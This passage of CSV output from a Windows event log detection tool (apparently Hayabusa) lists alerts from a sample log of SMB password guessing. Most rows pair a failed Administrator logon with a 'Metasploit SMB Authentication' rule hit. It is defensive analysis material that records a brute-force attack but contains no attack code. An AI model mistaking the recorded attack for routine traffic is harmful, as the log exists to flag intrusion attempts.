Password,User: Administrator : Type: 3 : Workstation: ssZya6gArnuepKyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rsDEj6o0NaKUYPZL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pELSIsupIYAxPCtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urHCDmdCfNexxUHf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czGXZFukLquA9Mce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: icWMY9pKCQMyTxJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v28FLC2WXEXSUiI5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FwhjHww5iA51SFjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 96BwmhKqDIojhdRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DiRvofjwoeAdHYrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BNLdOrPwbvYELiCc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x15WKTspmg2ALHaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QMoQWddkcYtCmoKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jhTbfX42Pwn7OA2k : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXcbUCgAhVFfqLc3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GHyXVM0jpaKBiY9N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TZoWEcU6VbEnrLpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LIfEzNQWwvrai4ga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DhImfqWz7SHId9hE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6sekQfneNE5uFtx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: iEQ6KkZEHGcSgdA8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qzxJYBbM7ZMaaGOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wO5GFBqSltNfjtQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PdsMzjfP1ZcPju2i : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LqpKmoCX9slPXie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ouHvw1LXTN3OSFYb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tZIB1QO7hfugceJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4QU2BQ0u5tJsdjG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0P7NKiKCmLvu6L1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4obkK4RfsLZe5gdi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JRUDpDLhgop8d1el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LvdsNkFqfFWRePXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wvd8c1jYrEZMcKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AWvECxgkvWdg9Zdc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHHPOAYSMSp3BhX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rJicXUMfrx9BOzHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eybrQWvrvwSkNADJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VVMPCaQB0XteDSwC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lbjjLoATZE6KPIQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tips954DRcYeIB2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: nLe9aMiMz0akxfWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: csroGB9KZOZkb5sY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Zl4Rc25RsvJ7Y9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5CxqCFOIJBMZCD6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gVPwxpR05F3B5aXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nP317UkK2DhTD5Rd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ir3c7dqXm1LhbfqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
